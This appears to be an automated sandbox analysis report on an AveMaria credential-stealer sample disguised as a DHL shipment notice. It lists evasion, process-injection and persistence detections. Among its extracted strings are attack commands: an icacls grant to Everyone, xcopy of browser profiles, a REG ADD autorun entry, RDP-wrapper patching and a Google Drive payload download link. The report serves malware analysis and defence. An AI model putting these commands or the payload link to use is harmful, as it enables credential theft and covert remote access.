Source: images.exe, 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: images.exe, 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: images.exe, 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

File opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | delete

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior
Source: C:\ProgramData\images.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\ProgramData\images.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior
Source: C:\ProgramData\images.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\ProgramData\images.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: DHL Express shipment notification.exe, 00000005.00000002.740302767.0000000002430000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1170610776.0000000002A20000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL
Source: DHL Express shipment notification.exe, 0000000E.00000002.1022206078.0000000003310000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1WMEKQGVHTBFHUC179QEYSF4NUF_7RF9G
Source: DHL Express shipment notification.exe, 00000005.00000002.740302767.0000000002430000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022206078.0000000003310000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1170610776.0000000002A20000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe TID: 1548	Thread sleep count: 70 > 30			Jump to behavior
Source: C:\ProgramData\images.exe TID: 2660	Thread sleep count: 70 > 30			Jump to behavior
Source: C:\ProgramData\images.exe TID: 3252	Thread sleep count: 364 > 30			Jump to behavior
Source: C:\ProgramData\images.exe TID: 3252	Thread sleep time: -364000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 2592	Thread sleep count: 3901 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 2592	Thread sleep time: -46812000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Code function: 5_2_02293692 rdtsc

5_2_02293692

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\ProgramData\images.exe	Window / User API: threadDelayed 364			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Window / User API: threadDelayed 3901			Jump to behavior

Queries a list of all running processes

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Process information queried: ProcessInformation

Jump to behavior

Queries a list of all running drivers

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

System information queried: ModuleInformation

Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: DHL Express shipment notification.exe, 0000000E.00000002.1022206078.0000000003310000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: DHL Express shipment notification.exe, 0000000E.00000002.1021014003.00000000019A3000.00000004.00000020.sdmp, explorer.exe, 0000000F.00000000.936184682.000000000DA04000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.987848818.000000000DA04000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5701113978.000000000D7F0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.985595787.000000000D7F0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5703739308.000000000DA04000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.934050366.000000000D7F0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020504850.0000000001947000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWH
Source: DHL Express shipment notification.exe, 00000005.00000002.740302767.0000000002430000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022206078.0000000003310000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1170610776.0000000002A20000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: explorer.exe, 0000000F.00000000.987347269.000000000D995000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.935700971.000000000D995000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5703169506.000000000D995000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW`
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat
Source: DHL Express shipment notification.exe, 00000005.00000002.740302767.0000000002430000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1170610776.0000000002A20000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll

Anti Debugging:

Hides threads from debuggers

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\ProgramData\images.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\ProgramData\images.exe	Thread information set: HideFromDebugger			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Code function: 5_2_02293692 rdtsc

5_2_02293692

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_02292A85 mov eax, dword ptr fs:[00000030h]		5_2_02292A85
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_02291E86 mov eax, dword ptr fs:[00000030h]		5_2_02291E86
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0228CF89 mov eax, dword ptr fs:[00000030h]		5_2_0228CF89
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_022949D1 mov eax, dword ptr fs:[00000030h]		5_2_022949D1
Source: C:\ProgramData\images.exe	Code function: 21_2_02292A85 mov eax, dword ptr fs:[00000030h]		21_2_02292A85
Source: C:\ProgramData\images.exe	Code function: 21_2_02291E86 mov eax, dword ptr fs:[00000030h]		21_2_02291E86
Source: C:\ProgramData\images.exe	Code function: 21_2_0228CF89 mov eax, dword ptr fs:[00000030h]		21_2_0228CF89
Source: C:\ProgramData\images.exe	Code function: 21_2_022949D1 mov eax, dword ptr fs:[00000030h]		21_2_022949D1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 39_2_00D2001A mov eax, dword ptr fs:[00000030h]		39_2_00D2001A

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process queried: DebugPort			Jump to behavior
Source: C:\ProgramData\images.exe	Process queried: DebugPort			Jump to behavior
Source: C:\ProgramData\images.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to register its own exception handler

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Code function: 5_2_02296860 RtlAddVectoredExceptionHandler,

5_2_02296860

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Memory written: C:\Windows\explorer.exe base: 33370000			Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Memory written: C:\Windows\explorer.exe base: 134B0000			Jump to behavior
Source: C:\ProgramData\images.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: D20000			Jump to behavior
Source: C:\ProgramData\images.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 3200000			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Memory allocated: C:\Windows\explorer.exe base: 134B0000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Memory allocated: C:\Windows\explorer.exe base: 33370000 protect: page execute and read and write			Jump to behavior
Source: C:\ProgramData\images.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: D20000 protect: page execute and read and write			Jump to behavior
Source: C:\ProgramData\images.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 3200000 protect: page read and write			Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Memory written: PID: 4856 base: 33370000 value: 58			Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Memory written: PID: 4856 base: 134B0000 value: E8			Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\ProgramData\images.exe

Thread created: C:\Windows\SysWOW64\cmd.exe EIP: D2010E

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\Users\user\Desktop\DHL Express shipment notification.exe "C:\Users\user\Desktop\DHL Express shipment notification.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"			Jump to behavior
Source: C:\ProgramData\images.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 0000000F.00000002.5662011236.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.913539334.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.963175215.00000000012A1000.00000002.00020000.sdmp, cmd.exe, 00000027.00000002.5658946366.0000000003B71000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000F.00000000.918325198.0000000004840000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5662011236.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.981394432.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.913539334.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.963175215.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000002.5696107995.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.930505618.000000000D366000.00000004.00000001.sdmp, cmd.exe, 00000027.00000002.5658946366.0000000003B71000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000F.00000002.5662011236.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.913539334.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.963175215.00000000012A1000.00000002.00020000.sdmp, cmd.exe, 00000027.00000002.5658946366.0000000003B71000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000F.00000000.911476901.0000000000B59000.00000004.00000020.sdmp, explorer.exe, 0000000F.00000000.960926581.0000000000B59000.00000004.00000020.sdmp, explorer.exe, 0000000F.00000002.5653330376.0000000000B59000.00000004.00000020.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 0000000F.00000002.5662011236.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.913539334.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.963175215.00000000012A1000.00000002.00020000.sdmp, cmd.exe, 00000027.00000002.5658946366.0000000003B71000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Source: C:\ProgramData\images.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Increases the number of concurrent connection per server for Internet Explorer

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

Jump to behavior

Stealing of Sensitive Information:

Yara detected Generic Dropper

Source: Yara match	File source: Process Memory Space: DHL Express shipment notification.exe PID: 6632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: images.exe PID: 8428, type: MEMORYSTR

Yara detected AveMaria stealer

Source: Yara match	File source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, type: MEMORY

Yara detected Credential Stealer

Source: Yara match	File source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DHL Express shipment notification.exe PID: 6632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: images.exe PID: 8428, type: MEMORYSTR

Remote Access Functionality:

Yara detected AveMaria stealer

Source: Yara match	File source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, type: MEMORY